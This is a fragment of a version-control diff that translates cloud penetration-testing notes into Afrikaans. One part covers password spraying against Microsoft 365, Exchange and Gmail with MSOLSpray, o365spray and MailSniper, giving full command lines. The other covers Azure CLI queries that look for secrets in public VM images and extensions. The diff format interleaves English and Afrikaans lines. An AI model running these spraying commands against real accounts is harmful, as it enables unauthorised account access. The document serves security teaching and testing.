Let egter daarop dat hierdie tegniek **baie luidrugtig** is en die Blue Team kan dit **maklik vang**. Boonop kan **gedwonge wagwoord kompleksiteit** en die gebruik van **MFA** hierdie tegniek soort van nutteloos maak.
Jy kan 'n wagwoord spuitaanval uitvoer met [**MSOLSpray**](https://github.com/dafthack/MSOLSpray)
```powershell
. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose
```
Or with [**o365spray**](https://github.com/0xZDH/o365spray)
Of met [**o365spray**](https://github.com/0xZDH/o365spray)
```bash
python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com
```
Or with [**MailSniper**](https://github.com/dafthack/MailSniper)
Of met [**MailSniper**](https://github.com/dafthack/MailSniper)
```powershell
#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
@@ -31,9 +26,4 @@ Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
```
{{#include ../../../banners/hacktricks-training.md}}

24
src/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md
View File

@@ -2,22 +2,21 @@
{{#include ../../../banners/hacktricks-training.md}}
## Virtual Machines
## Virtuele Masjiene
For more info about Azure Virtual Machines check:
Vir meer inligting oor Azure Virtuele Masjiene, kyk:
{{#ref}}
../az-services/vms/
{{#endref}}
### Exposed vulnerable service
### Blootgestelde kwesbare diens
A network service that is vulnerable to some RCE.
'n Netwerkdiens wat kwesbaar is vir sommige RCE.
### Public Gallery Images
A public image might have secrets inside of it:
### Publieke Galery Beelde
'n Publieke beeld mag geheime daarin hê:
```bash
# List all community galleries
az sig list-community --output table
@@ -25,11 +24,9 @@ az sig list-community --output table
# Search by publisherUri
az sig list-community --output json --query "[?communityMetadata.publisherUri=='https://3nets.io']"
```
### Publieke Uitbreidings
### Public Extensions
This would be more weird but not impossible. A big company might put an extension with sensitive data inside of it:
Dit sou meer vreemd wees, maar nie onmoontlik nie. 'n Groot maatskappy mag 'n uitbreiding met sensitiewe data daarin plaas:
```bash
# It takes some mins to run
az vm extension image list --output table
@@ -37,9 +34,4 @@ az vm extension image list --output table
# Get extensions by publisher
az vm extension image list --publisher "Site24x7" --output table
```
{{#include ../../../banners/hacktricks-training.md}}